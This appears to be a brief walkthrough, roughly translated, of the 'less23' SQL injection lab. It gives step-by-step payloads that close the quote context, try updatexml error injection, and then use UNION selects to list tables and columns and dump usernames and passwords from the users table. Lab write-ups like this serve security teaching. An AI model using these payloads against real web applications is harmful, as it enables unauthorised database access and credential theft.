SQL injection less23 (filter comment)

?id=1

?id=1'

''1'' LIMIT 0,1'
First remove a single quotation mark on the left and right , Equivalent to quotation in Chinese
'1'' LIMIT 0,1
It's obvious that it's a single quotation mark

SELECT * FROM users WHERE id='$id' LIMIT 0,1
Because annotations are filtered , We can manually close the following single quotation marks

?id=1' and '1'='1

?id=1' and '1'='2

Want to use error injection , Because there will be error messages

?id=1' and updatexml(1, concat('#', database()), 1) and '1'='1

In the end, there may be more Limit 0,1 This part , Cause the statement to make an error

So give up error reporting

Try to use union Inject , Because there is echo point
?id=1' order by 4 and '1'='1

Cannot find the number of fields

Use it directly union, To test the number of fields one by one
?id=1' union select 1,'2

It can be
?id=1' union select 1,2,'3

View echo location
?id=-1' union select 1,2,'3

Database search
?id=-1' union select 1,(select concat(database(), 0x7e, @@basedir)),'3

Look up the table
?id=-1' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema="security"),'3

Check field
?id=-1' union select 1, (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),'3

Check data
?id=-1' union select 1, (select group_concat(username,0x3a,password) from security.users),'3